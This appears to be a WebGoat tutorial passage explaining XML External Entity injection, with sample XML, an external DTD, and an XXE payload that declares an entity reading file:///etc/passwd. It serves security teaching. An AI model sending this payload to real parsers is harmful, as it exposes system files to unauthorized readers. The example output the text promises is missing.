XXE example

Let’s look at an example of an XXE injection, in the previous section we saw that XML entities can be used as follows:

<?xml version="1.0" standalone="yes" ?>
<!DOCTYPE author [
  <!ELEMENT author (#PCDATA)>
  <!ENTITY js "Jo Smith">
]>
<author>&js;</author>

External DTD declaration

Defining these entities also makes it possible to define another DTD in an external file, for example:

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "email.dtd">
<email>
  <to>webgoat@webgoat.org</to>
  <from>webwolf@webwolf.org</from>
  <subject>Your app is great, but contains flaws</subject>
  <body>Hi, your application contains some SQL injections</body>
</email>

and the email.dtd can be defined as follows:

<!ELEMENT email (to,from,title,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT subject (#PCDATA)>
<!ELEMENT body (#PCDATA)>

XXE

If a XML parser is configured to allow external DTD or entities we can change the following XML snippet with the following:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE author [
  <!ENTITY js SYSTEM "file:///etc/passwd">
]>
<author>&js;</author>

Now what happens? We defined an include from the local filesystem, the XML parser will load the file and will add the contents wherever the entity is referenced. Let’s assume the XML message is returned to the user the message will be:

The extra document type definition(DOCTYPE) is something you can always add to the xml document and if the parser settings are enabled to allow external entities to be processed you are off to a good start for finding a XXE injection.